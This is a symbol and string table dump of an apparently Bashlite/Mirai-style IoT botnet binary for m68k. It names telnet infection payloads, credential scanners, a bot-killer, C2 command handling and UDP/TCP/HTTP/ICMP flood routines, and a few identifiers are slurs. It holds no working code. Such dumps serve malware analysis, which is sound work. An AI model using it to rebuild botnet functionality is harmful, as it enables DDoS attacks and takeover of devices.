GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.data
.bss
.comment
libc/sysdeps/linux/m68k/crti.S
have_current_got
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2170
p.2168
__do_global_dtors_aux
call___do_global_dtors_aux
object.2251
frame_dummy
call_frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
call___do_global_ctors_aux
libc/sysdeps/linux/m68k/crtn.S
libc/sysdeps/linux/m68k/crt1.S
Bones.c
C.3.4125
C.0.4108
C.8.4170
C.13.4267
i.4319
printchar
prints
printi
print
fdopen_pids
hextable
ipState
libc/sysdeps/linux/m68k/vfork.S
fix_errno
__syscall_fcntl.c
__syscall_fcntl64.c
__syscall_fcntl64
_exit.c
__syscall_exit
access.c
chdir.c
__syscall_chdir
close.c
dup2.c
fork.c
getdtablesize.c
geteuid.c
getpid.c
getrlimit.c
ioctl.c
kill.c
__syscall_kill
open.c
__syscall_open
pipe.c
prctl.c
read.c
select.c
setsid.c
sigprocmask.c
time.c
waitpid.c
write.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
errno.c
__errno_location.c
puts.c
sprintf.c
vsnprintf.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.3828
_fixed_buffers
_wcommit.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
_do_one_spec
spec_base.4041
prefix.4042
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
_is_equal_or_bigger_arg
spec_flags.4040
qual_chars.4045
spec_chars.4041
spec_ranges.4042
spec_or_mask.4043
spec_and_mask.4044
fputc_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
_wordcopy_fwd_aligned
_wordcopy_fwd_dest_aligned
memset.c
strchr.c
strcmp.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1089
_string_syserrmsgs.c
bcopy.c
strcasestr.c
strtok.c
next_start.1067
isatty.c
tcgetattr.c
ntohl.c
herror.c
h_nerr
h_errlist
error_msg
colon_space.2720
inet_ntoa.c
buf.2603
inet_makeaddr.c
gethostbyname.c
buf.4831
h.4830
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
__malloc_from_heap
initial_fa
free.c
__heap_delete
__free_to_heap
heap_alloc.c
__heap_free_area_alloc
heap_free.c
__heap_link_free_area
__heap_link_free_area_after
__heap_add_free_area
rand.c
random.c
mylock
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_suid
__check_one_fd
been_there_done_that.2790
__socketcall.c
execve.c
getegid.c
getgid.c
getuid.c
nanosleep.c
sbrk.c
wait4.c
__syscall_wait4
tolower.c
__C_ctype_tolower.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
fprintf.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
vfprintf.c
memchr.c
memmove.c
_wordcopy_bwd_aligned
_wordcopy_bwd_dest_aligned
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
sigaction.c
abort.c
been_there_done_that
dl-support.c
brk.c
__syscall_rt_sigaction.c
poll.c
fclose.c
fopen.c
fseeko.c
fseeko64.c
_adjust_pos.c
_fopen.c
_cs_funcs.c
fgets.c
fflush_unlocked.c
fgets_unlocked.c
rawmemchr.c
strncat.c
strspn.c
strdup.c
ntop.c
inet_pton4
inet_pton6
xdigits.3095
inet_ntop4
inet_ntop6
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
raise.c
llseek.c
__syscall_llseek
fgetc_unlocked.c
strcasecmp.c
encoded.c
decoded.c
lengthd.c
_READ.c
_rfill.c
_trans2r.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
__GI_memchr
userID
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
stdout
random
__GI_strdup
getdtablesize
__GI_h_errno
contains_fail
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
putc_unlocked
recv
connect
__encode_question
__GI___uClibc_fini
D3cOdeMePlS
numpids
__encode_header
__GI_strncat
sigemptyset
__pthread_mutex_lock
initConnection
__sigdelset
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
__GI_setsid
Phonepid
memmove
sendTCP
__bsd_signal
__GI_strpbrk
__stdio_trans2r_o
__GI_setsockopt
__libc_stack_end
phone2
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getc_unlocked
__ctype_b
__GI_random_r
usernames
sendUKNOWN
errno
getegid
read_until_response
__GI_sbrk
zprintf
__GI___uClibc_init
execve
getpid
__GI_lseek64
setstate_r
fgets
getHost
__libc_getpid
HackerScan1
wildString
__xpg_strerror_r
__heap_free
fcntl64
prctl
memcpy
makeRandomStr
__GI_fputs_unlocked
execl
__GI_fgets
sendHTTP
creat
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
puts
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
tolower
getuid
system
__open_etc_hosts
malloc
isatty
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
phonepayload
random_r
__dso_handle
__malloc_heap_lock
gethostbyname_r
tcpcsum
fdpclose
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
D1ckSuckaz
__GI_memset
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
__GI_herror
__GI_open
__GI_strchr
__searchdomain
__malloc_heap
sigaddset
__GI_tcgetattr
__environ
wcsnrtombs
makeIPPacket
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
_init
D1ckSucka
__GI_inet_ntoa_r
hostname_to_ip
__GI_setstate_r
parseHex
strtol
pipe
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
__GI___C_ctype_b_data
__sigaddset
nanosleep
__GI_send
h_errno
__pthread_mutex_unlock
wait4
__GI_exit
__app_fini
csum
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
environ
__GI_close
getBuild
Server_Botport
fprintf
Eleele
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
TelnetPayload2
__GI_brk
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
__deregister_frame_info
ourIP
Do nine men interpret Nine men I nod
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
__raise
setsockopt
bsd_signal
fseek
__GI_kill
__GI_strcmp
__GI_memmove
sendSTD
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
strcasestr
_start
strstr
__GI_ioctl
init_rand
rand
signal
read
__decode_header
__GI___h_errno_location
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
strncpy
strcasecmp
htonl
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
HackerScan2
__GI_gethostbyname_r
__GI_strncpy
TelnetPayload
__libc_send
PhoneScanner
__GI___xpg_strerror_r
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__GI___fputc_unlocked
__stdio_adjust_position
__GI_poll
_vfprintf_internal
__GI_strcasestr
fork
__stdio_rfill
strncat
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
_store_inttype
__length_dotted
__GI_random
__uclibc_progname
__GI_getegid
__GI_wait4
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
__libc_open
getOurIP
get_telstate_host
memset
__GI_socket
main
__glibc_strerror_r
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
initstate
fclose
__syscall_rt_sigaction
ntohs
sendUDP
inet_ntoa
tcgetattr
__C_ctype_tolower_data
time
__libc_system
__GI_abort
poll
fdpopen
__GI_fprintf
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
botkiller
herror
strcmp
advances2
__nameserver
data_start
HackerScan
__h_errno_location
__GI_putc_unlocked
matchPrompt
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
_fini
__GI_chdir
__vfork
__malloc_sbrk_lock
contains_success
sprintf
Niggerdirs
fdgets
strerror_r
__GI_select
__libc_waitpid
socket_connect
__GI_waitpid
__GI_vfprintf
_stdio_term
__decode_answer
__GI_signal
stderr
fails
vfork
__C_ctype_b
srandom
ICMPFlood
_ppfs_setargs
__GI_sendto
__GI_sigemptyset
__libc_fork
__atexit_lock
scanPid
rand_cmwc
findARandomIP
advances
__libc_fcntl64
getsockopt
__GI_fseeko64
hstrerror
fflush_unlocked
__stdio_wcommit
HackerPrint
contains_string
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
access
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
_end
phone
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
PhoneScan
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
uppercase
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
__heap_alloc
inet_ntop
__C_ctype_toupper_data
_dl_aux_init
_errno
atoi
successes
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__libc_creat
strlen
lseek64
open
toupper
__libc_write
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
__GI_raise
__data_start
setsid
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
fputc_unlocked
fcntl
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
__register_frame_info
wcrtomb
__GI_getsockname
close
__libc_connect
passwords
__GI_strlen
pids
vfprintf
strpbrk
_load_inttype
rangechoice
raise
useragents
free
sigprocmask
__fputc_unlocked
getsockname
